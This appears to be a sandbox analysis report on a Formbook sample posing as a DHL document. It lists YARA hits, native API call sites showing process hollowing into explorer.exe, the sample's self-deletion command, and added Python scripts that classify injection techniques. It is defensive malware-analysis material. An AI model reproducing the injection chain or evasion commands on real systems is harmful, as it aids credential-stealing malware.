Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
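The rule hits above come from two independent Formbook signatures and land in several processes, and the dump names encode which process and which memory region each hit refers to. The script below is an added example, not part of the Joe Sandbox report, that groups the hits per process and pulls out the regions that were writable and executable when the payload was found. It assumes that the first dotted field of an .sdmp name is the report's process index (the report itself pairs 00000001 with DHL DOC 3406506482.exe and 0000000E with explorer.exe), that the fourth field is the region base and that the fifth is the Win32 page protection; the sample lines are a subset copied from this section, with rule metadata truncated.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Matched rule" lines of this report, copied as they
# appear above (only the rule name is needed from the metadata, so it is truncated here).
SAMPLE_LINES = """
Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23
Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23
Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group
"""

# Process indices the report names elsewhere: 0 and 1 are the two "DHL DOC 3406506482.exe"
# instances, 14 (0x0E) is C:\Windows\SysWOW64\explorer.exe. Index 2 is not named in this section.
KNOWN_PROCS = {0: "DHL DOC 3406506482.exe", 1: "DHL DOC 3406506482.exe", 14: "SysWOW64\\explorer.exe"}

# Assumption: the fifth dotted field of an .sdmp name is the Win32 page protection of the region.
PAGE_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Accepts both the cleaned form ("UNPACKEDPE | Matched rule") and the run-together extraction form.
LINE_RE = re.compile(r"Source:\s*(?P<src>.+?),\s*type:\s*(?P<kind>UNPACKEDPE|MEMORY)"
                     r"\s*\|?\s*Matched rule:\s*(?P<rule>\S+)")
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.\d+\.([0-9A-Fa-f]{16})"
                     r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\..+\.([0-9A-Fa-f]+)\.\d+\.(?:raw\.)?unpack$")


def parse_source(src):
    """Return (process index, region base, page protection or None) for a dump or unpack name."""
    m = SDMP_RE.match(src)
    if m:
        return int(m.group(1), 16), int(m.group(3), 16), int(m.group(4), 16)
    m = UNPACK_RE.match(src)
    if m:
        return int(m.group(1)), int(m.group(3), 16), None   # unpacked PE: protection not encoded
    raise ValueError("unrecognised source name: %s" % src)


def summarize(report_text):
    """Group rule hits by process index: which rules fired and in which (base, protection) regions."""
    procs = defaultdict(lambda: {"rules": set(), "regions": set()})
    for m in LINE_RE.finditer(report_text):
        proc, base, protect = parse_source(m.group("src"))
        procs[proc]["rules"].add(m.group("rule"))
        procs[proc]["regions"].add((base, protect))
    return dict(procs)


def rwx_regions(summary):
    """(process, base) pairs where a hit sat in PAGE_EXECUTE_READWRITE memory: the payload runs from these."""
    return sorted((proc, base) for proc, info in summary.items()
                  for base, protect in info["regions"] if protect == 0x40)


def report(summary):
    lines = []
    for proc in sorted(summary):
        name = KNOWN_PROCS.get(proc, "process #%d" % proc)
        rules = ",".join(sorted(summary[proc]["rules"]))
        for base, protect in sorted(summary[proc]["regions"], key=lambda r: (r[0], -1 if r[1] is None else r[1])):
            prot = "unpacked PE" if protect is None else PAGE_NAMES.get(protect, hex(protect))
            lines.append("proc %2d %-24s 0x%08X %-22s rules=%s" % (proc, name, base, prot, rules))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(summarize(SAMPLE_LINES)))
```

Two rules from unrelated authors agreeing on the same region is the point of reading the list this way: a single autogenerated rule can misfire on shared packer code, but both firing on an RWX region inside explorer.exe (process 14) is the injected payload, not the loader.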
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_003B2050
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFE778
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFE777
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFBDC4
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_059A2440
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_059A3328
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_059A6BB0
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_059A6BA0
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041E070
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00401030
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041E225
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041EB4E
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041EB51
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041E583
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00402D87
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041D5A3
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00409E60
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041DED3
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00492050
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A320A0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A1B090
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04AC1002
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A1841F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A32581
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A1D5E0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A00D20
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A24120
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A0F900
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04AD1D55
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A26E30
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A3EBB0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8E225
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8EB51
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8EB4E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8E070
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8DED3
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D79E60
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D72FB0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D72D90
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D72D87
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8E583
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8D5A3
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 04A0B150 appears 35 times
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A360 NtCreateFile,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A410 NtReadFile,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A490 NtClose,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A35A NtCreateFile,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A48A NtReadFile,NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A495D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A496D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A498A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A498F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A495F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A499D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49560 NtWriteFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49A20 NtResumeThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49A10 NtQuerySection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A497A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49760 NtOpenProcess,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4A770 NtOpenThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8A360 NtCreateFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8A490 NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8A410 NtReadFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8A540 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8A35A NtCreateFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8A48A NtReadFile,NtClose,
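The native API call sites listed above for the SysWOW64 explorer.exe (process 14) are what the report's "process hollowing", "queues an APC in another process" and "modifies the context of a thread in another process" verdicts rest on: NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread are the hollowing primitives, NtQueueApcThread the APC primitive, NtCreateSection plus NtMapViewOfSection the section-mapping primitive. The script below is an added example, not part of the report, that parses these lines into a per-process call table and names the technique each table covers. The technique definitions are the usual presence rules and are my own; the lines are call sites found in the dumped code, so they show capability, not that the calls ran or in what order. The sample lines are copied from this section.

```python
import re
from collections import defaultdict

# Constructed sample: "Code function" lines copied from this report. Process 1 is the second
# "DHL DOC 3406506482.exe" instance, process 14 is C:\Windows\SysWOW64\explorer.exe.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A360 NtCreateFile,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041A48A NtReadFile,NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A498A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A499D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A49A20 NtResumeThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A497A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A4A770 NtOpenThread,
"""

# "<proc>_<run>_<address> Name1,Name2," : the trailing comma is part of the report's format.
CALL_RE = re.compile(r"Code function:\s*(?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+)\s+(?P<calls>[A-Za-z0-9_,]+)")

# Presence rules (my own, not the report's): every name in all_of plus at least one of any_of.
# An empty any_of is satisfied trivially. Order of calls is not checked.
TECHNIQUES = [
    ("process hollowing",
     {"NtUnmapViewOfSection", "NtSetContextThread", "NtResumeThread"},
     {"NtCreateProcessEx", "NtWriteVirtualMemory", "NtMapViewOfSection"}),
    ("APC queue injection",
     {"NtQueueApcThread"},
     {"NtWriteVirtualMemory", "NtMapViewOfSection", "NtAllocateVirtualMemory"}),
    ("section mapping into a foreign process",
     {"NtCreateSection", "NtMapViewOfSection"},
     set()),
    ("thread context hijack",
     {"NtGetContextThread", "NtSetContextThread"},
     {"NtSuspendThread", "NtResumeThread", "NtOpenThread"}),
]


def call_sites(report_text):
    """Map process index -> {native API name -> sorted call-site addresses}.

    Only Nt* names are kept; LdrInitializeThunk and similar loader names that the report
    lists next to them are not syscall stubs and would only add noise to the rules.
    """
    sites = defaultdict(lambda: defaultdict(set))
    for m in CALL_RE.finditer(report_text):
        proc, addr = int(m.group("proc")), int(m.group("addr"), 16)
        for name in filter(None, m.group("calls").split(",")):
            if name.startswith("Nt"):
                sites[proc][name].add(addr)
    return {p: {n: sorted(a) for n, a in apis.items()} for p, apis in sites.items()}


def injection_techniques(sites):
    """Return {proc: [technique names]} for every process whose call table covers a technique."""
    found = {}
    for proc, apis in sites.items():
        present = set(apis)
        hits = [name for name, all_of, any_of in TECHNIQUES
                if all_of <= present and (not any_of or any_of & present)]
        if hits:
            found[proc] = hits
    return found


if __name__ == "__main__":
    table = call_sites(SAMPLE_LINES)
    for proc, apis in sorted(table.items()):
        print("process %d: %d native API call sites" % (proc, sum(len(a) for a in apis.values())))
    for proc, hits in sorted(injection_techniques(table).items()):
        print("process %d covers: %s" % (proc, "; ".join(hits)))
```

Read the result together with the process tree further down: the process that carries the hollowing and APC call tables is not the dropped sample but an explorer.exe started from SysWOW64, which is exactly the "system process connects to network" and "maps a DLL or memory area into another process" picture the signature list gives. For order-sensitive detection (unmap before write before set-context) an API trace from the sandbox or an EDR is needed; the static call table only says the capability is there.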
Source: DHL DOC 3406506482.exe, 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000000.00000002.247896269.000000000045C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSymLanguageTy.exeB vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000000.00000002.252007912.00000000059B0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000000.00000003.240961826.0000000003846000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000001.00000000.246111705.000000000053C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSymLanguageTy.exeB vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000001.00000002.316614192.00000000011FF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe, 00000001.00000002.320523635.000000000372E000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe | Binary or memory string: OriginalFilenameSymLanguageTy.exeB vs DHL DOC 3406506482.exe
Source: DHL DOC 3406506482.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: DHL DOC 3406506482.exe | Virustotal: Detection: 29%
Source: DHL DOC 3406506482.exe | ReversingLabs: Detection: 37%
Source: DHL DOC 3406506482.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\DHL DOC 3406506482.exe "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Process created: C:\Users\user\Desktop\DHL DOC 3406506482.exe C:\Users\user\Desktop\DHL DOC 3406506482.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Process created: C:\Users\user\Desktop\DHL DOC 3406506482.exe C:\Users\user\Desktop\DHL DOC 3406506482.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL DOC 3406506482.exe.log
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@5/2
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1688:120:WilError_01
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: DHL DOC 3406506482.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL DOC 3406506482.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
